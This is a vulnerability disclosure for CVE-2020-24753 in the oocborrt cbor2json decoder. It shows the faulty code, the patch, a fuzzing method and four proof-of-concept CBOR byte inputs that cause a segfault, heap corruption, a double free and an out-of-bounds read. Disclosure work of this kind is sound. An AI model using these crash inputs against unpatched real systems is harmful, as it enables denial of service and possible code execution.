Summary:

A memory corruption vulnerability in Objective Open CBOR Run-time (oocborrt) before 2020-08-12 could allow an attacker to execute code via crafted Concise Binary Object Representation (CBOR) input to the cbor2json decoder. An uncaught error while decoding CBOR Major Type 3 text strings leads to the use of an attacker-controllable uninitialized stack value. This can be used to modify memory, causing a crash or heap corruption.

CVSS v3.1 Score: 6.5/10

Vulnerability Details:

The cbor2json decoder utility in the Objective Open CBOR Run-time library up through commit de254ab (before 2020-08-12) is missing an error handling check after decoding a UTF8 string in a given CBOR data stream. Since this utility could be integrated into various data interchange systems which parse external inputs, a remote attacker may be able to execute arbitrary code through heap corruption.

cbor2json.c:

112:   case OSRTCBOR_UTF8STR: {
113:      OSUTF8CHAR* utf8str;
114:      ret = rtCborDecDynUTF8Str (pCborCtxt, ub, (char**)&utf8str;);
115:
116:      ret = rtJsonEncStringValue (pJsonCtxt, utf8str);
117:      rtxMemFreePtr (pCborCtxt, utf8str);
118:      if (0 != ret) return LOG_RTERR (pJsonCtxt, ret);
119:
120:      break;
121:   }

Line 115 of the above file is missing a check of the return value of rtCborDecDynUTF8Str(). If a malicious CBOR input causes rtCborDecDynUTF8Str() to return prematurely, the error is not caught and utf8str is erroneously passed to rtJsonEncStringValue(). utf8str is attacker-influenced because it is uninitialized stack memory that typically contains a leftover stack value from the decoding of a CBOR data item earlier in the data stream.

Figure 1: Disassembly showing tainted stack address RBP-0x58 passed to rtJsonEncStringVlaue

In the simplest case, this results in a Segmentation Fault as the program will eventually execute strlen() on a pointer to an invalid memory location. This memory location is influenceable by the attacker. In other cases, the attacker can manipulate the value of utf8str to cause heap corruption, which is generally considered exploitable.

Patch:

The following patch was proposed to the vendor and they pushed a fix to their public github repository within 3 hours of being notified of the issue.

# diff cbor2json.c ../../oocborrt_gold/oocborrt/util/cbor2json.c
115d114
< if (0 != ret) return LOG_RTERR (pJsonCtxt, ret);

This patch inserts the check into the above function like so:

112: case OSRTCBOR_UTF8STR: {
113: OSUTF8CHAR* utf8str;
114: ret = rtCborDecDynUTF8Str (pCborCtxt, ub, (char**)&utf8str;);
115: if (0 != ret) return LOG_RTERR (pJsonCtxt, ret);
116: ret = rtJsonEncStringValue (pJsonCtxt, utf8str);
117: rtxMemFreePtr (pCborCtxt, utf8str);
118: if (0 != ret) return LOG_RTERR (pJsonCtxt, ret);
119:
120: break;
121: }

Discovery Method:

Fuzz testing (or fuzzing) has been around almost as long as programming has. It is a well-known technique, but recent advances in the art of fuzzing have dramatically increased its popularity among software developers and security researchers alike. American Fuzzy Lop (AFL) in particular has taken the world by storm since its creation in 2013 by Michał Zalewski. The key insight behind AFL was that software bugs are more likely to be found when more code in the target program is covered. A simple fuzzer that supplies completely random data to a program would have to run for an extremely long time to reach deep codepaths and corner cases in the target program where vulnerabilities are likely to lurk. Instead of supplying completely random inputs, coverage-guided fuzzers like AFL and Honggfuzz use instrumentation inserted into a recompiled version of the target program to give feedback to the fuzzer. In this way, the fuzzer can detect when a test input has caused new code paths to execute in the target program and re-use that input in future mutations.

This is a useful tool for CBOR decoders because coverage-guided fuzzers can, through code coverage metrics, detect when permutations of a CBOR data stream are reaching deeper code and passing sanity checks. CBOR is a fast fuzzing target because a single byte encodes information about the following content in the data item. This allows simple mutators such as bit flipping to reach new code quickly.

To fuzz cbor2json, simply download the source code from github, identify a test corpus such as the cbor files in the repo already, compile cbor2json with the Honggfuzz compiler, and then run the fuzzer in a VM on a laptop. If the test corpus is large, minimize it first. Coverage-guided fuzzers are much more effective when they start with a small number of small inputs.

cd lib && rm *.a
cd ../build && make clean && make CC=/path/to/honggfuzz/hfuzz_cc/hfuzz-clang
cd ../util && make CC=/path/to/honggfuzz/hfuzz_cc/hfuzz-clang LINK=/path/to/honggfuzz/hfuzz_cc/hfuzz-clang LINKOPT='-fsanitize=address'
cp message.cbor input_dir/
/path/to/honggfuzz/honggfuzz -i input_dir/ -W work_dir/ -- ./cbor2json -i ___FILE___

For longer-term fuzzing it is always advisable to use “persistent” mode in AFL++ or Honggfuzz to dramatically increase the number of executions per second up to 100,000 execs/second or more. For our purposes here it is enough to simply run Honggfuzz against the program naively, reaching 500 execs/second. Within two seconds of executing the fuzzer, it finds a Segmentation Fault.

We let the fuzzer run after changing all assert()’s to exit(0) instead of SIGABRT so we don’t pollute our findings. Hitting an assert() is not notable in this particular program. Once we have a collection of crashes, we use the gdb exploitable plugin (https://github.com/jfoote/exploitable) to bin and triage crashes with a simple bash script. Fuzzing identified 130 “unique” crashes after 10 days of fuzzing and 300 million execs, all of which turned out to be the same root cause.

It is important with bugs like this one to always reproduce the issue on both a “stock” binary, and to use AddressSanitizer (https://clang.llvm.org/docs/AddressSanitizer.html). Since Honggfuzz inserts instrumentation into the binary, it’s possible that an input that crashes under Honggfuzz will not crash when compiled with regular gcc, or clang. ASAN is an important tool because it helps to identify the issue earlier in the code path. Many memory corruption bugs will not crash a program, but ASAN uses red zones to immediately detect any out of bounds accesses.

Lastly, we want to minimize the inputs that Honggfuzz finds for us. Reporting a huge fuzzer-generated input to a vendor and saying “it crashes!” is better than nothing… but not particularly helpful. One can use minimization tools like (afl-tmin) to find unimportant parts of the corpus that aren’t necessary to cover the same code paths. We used the smallest crashing input files and manually stepped through them in gdb to observe the behavior of the program until root cause was identified.

Proof of Concepts:

The following CBOR proof of concepts show the various ways in which the previously described missing check can result in memory corruption.

Proof of Concept #1 (Simple segfault):

The PoC input is a binary file with the following contents:

bf61 419f 9fff 7d

Depending on the compiler and the arrangement of memory, this PoC may either exhibit this error handling behavior:

./cbor2json -i poc1
ERROR: Status -2
Unexpected end of buffer on decode
Stack trace: Module: cbor2json.c, Line 154
Module: cbor2json.c, Line 154
Module: cbor2json.c, Line 67
Module: ../rtxsrc/context.c, Line 169
Module: ../rtcborsrc/rtCborDecDynUTF8Str.c, Line 117
Module: ../rtcborsrc/rtCborDecUInt32.c, Line 55
Module: ../rtxsrc/context.c, Line 169

Or a crash:

./cbor2json -i poc1
Segmentation fault

We can break down this minimal crashing input by following the RFC. CBOR is a relatively simple encoding scheme, but has support for nested and indefinite length data items which can increase complexity of parsers.

The first byte of our above data stream is 0xBF. The top 3 most significant bits of the byte control the data type, and the 5 least significant bits are “additional information” such as length. Therefore 0xBF can be decoded like so:

Top 3 bits: 0xBF = (0x5<<5)|0x1F = 0x5 (map data type)
Bottom 3 bits: (0xBF|0x1F) = 0x1F (indefinite length)

Moving through the rest of the data stream:

0x61 = Bit-string (0x61>>5 == 0x03). 0x61&0x1f == 0x1

0x41 = contents of bit string ‘A’. This is the name of map (all maps must contain a string as the first element)

0x9F = Start of indefinite length array

0x9F = Start of nested indefinite length array

0xFF = Stop code for nested indefinite length array

0x7D = Indefinite length bit-string

End of file

Note that the above arrays, map, and bit-strings are not properly terminated.

This 7-byte file can result in a segmentation fault when 0x1 (the length of the first fixed length bit-string) is dereferenced as [rdi] in strlen(). Since the vulnerability uses old stack frames, the crash may not trigger in all compiled binaries. This is not the only PoC though, and other test cases will reproduce similar behavior.

The value that is dereferenced in the strlen() call is influenced by the attacker. For instance, if we wish to dereference 0x02 instead of 0x01, we can increase the size of the previous UTF8 bit string to 2.

bf62 41419f 9fff 7d

Which will segfault when dereferencing the value 0x2 in the RDI register.

Using a similar input from the crashes Honggfuzz found shows that some crashes dereference high memory as well, not just near-NULL offsets. For instance, the input below will crash on 0x7700000060.

CBOR Input:

00000000: 877f 7f7e 017f 7f32 777f 7a7f 7f7f 0010
00000010: 005d

Proof of Concept #2 (heap corruption):

Depending on the layout of memory and the heap implementation, similar malformed CBOR files can trigger heap corruption, use-after-free, or double-free conditions. Heap corruption influencing a pointer that is later used to write data can result in arbitrary code execution.

CBOR Input:

bf60 8c60 607b 3f60 4030

./cbor2json -i poc2
malloc(): mismatching next->prev_size (unsorted)
Aborted

Since the cbor2json library and utilities could be compiled for systems without modern heap protections as in included with glibc, the vulnerability may be easier to exploit on embedded systems.

Proof of Concept #3 (double free):

CBOR Input:

00000000: bf60 8c60 607b 6060 c030

./cbor2json -i poc4
ERROR: Status 0
normal completion status
ERROR: Status -60
Feature not supported: CBOR tag 6
Stack trace: Module: cbor2json.c, Line 181
ERROR: Status 0
normal completion status
Stack trace: Module: cbor2json.c, Line 154
free(): double free detected in tcache 2
Aborted

Proof of Concept #4 (Out of Bounds Heap Access):

CBOR Input:

00000000: 9082 787a 76ff d380 007a 607a 5c78 3030 ..xzv....z`z\x00
00000010: 007f 7a83 0707 0707 7aff 8072 7a7a 7a07 ..z.....z..rzzz.
00000020: 007f 7a77 0707 7a00 7f9a 7707 7a00 7f9a ..zw..z...w.z...
00000030: 7707 0707 5f4f 8022 746f d87f ffff ff7a w..._O."to.....z
00000040: 7a00 7f7a 7717 077a 007f 9a77 0707 000b z..zw..z...w....
00000050: 5f5f 5f7a 7a5f 6430

Running this input under a binary compiled with AddressSanitizer shows an out of bounds read further indicating that the earlier CBOR data stream influences the location of the invalid memory reads and writes.

==3433867==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c0000000bb at pc 0x7f31daf0edf8 bp 0x7ffd53dc3b50 sp 0x7ffd53dc3300
READ of size 124 at 0x60c0000000bb thread T0
#0 0x7f31daf0edf7 (/lib/x86_64-linux-gnu/libasan.so.5+0x64df7)
#1 0x559e0dc19d27 in rtJsonEncStringValue (/oocborrt/util/cbor2json+0x19d27)
#2 0x559e0dc057eb in cbor2json /oocborrt/util/cbor2json.c:116
#3 0x559e0dc05aeb in cbor2json /oocborrt/util/cbor2json.c:177
#4 0x559e0dc05aeb in cbor2json /oocborrt/util/cbor2json.c:177
#5 0x559e0dc05fbf in main /oocborrt/util/cbor2json.c:291
#6 0x7f31dabcbbba in __libc_start_main ../csu/libc-start.c:308
#7 0x559e0dc05309 in _start (/oocborrt/util/cbor2json+0x5309)

0x60c0000000bb is located 0 bytes to the right of 123-byte region [0x60c000000040,0x60c0000000bb)
allocated by thread T0 here:

#0 0x7f31dafb1628 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x107628)
#1 0x559e0dc0788e in rtxMemAlloc (/oocborrt/util/cbor2json+0x788e)
#2 0x559e0dc15fed in rtCborDecDynUTF8Str (/oocborrt/util/cbor2json+0x15fed)
#3 0x559e0dc057d5 in cbor2json /oocborrt/util/cbor2json.c:114
#4 0x559e0dc05aeb in cbor2json /oocborrt/util/cbor2json.c:177
#5 0x559e0dc05aeb in cbor2json /oocborrt/util/cbor2json.c:177
#6 0x559e0dc05fbf in main /oocborrt/util/cbor2json.c:291
#7 0x7f31dabcbbba in __libc_start_main ../csu/libc-start.c:308

SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x64df7)

Shadow bytes around the buggy address:

0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c187fff8010: 00 00 00 00 00 00 00[03]fa fa fa fa fa fa fa fa
0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3433867==ABORTING

Conclusion:

Fuzzing is becoming integrated more and more often into the software development lifecycle. Projects such as Google’s OSS-Fuzz are bringing fuzzing to almost all major open source projects. Furthermore, as it becomes harder and harder to find shallow vulnerabilities quickly exposed by first generation coverage-guided fuzzers and a limited corpus, new tools and more complex techniques are arising. Nevertheless, there are still many codebases that have never been fuzzed, which present a great opportunity for researchers to dive into fuzzing.

CVE-2020-24753: Memory corruption vulnerability in oocborrt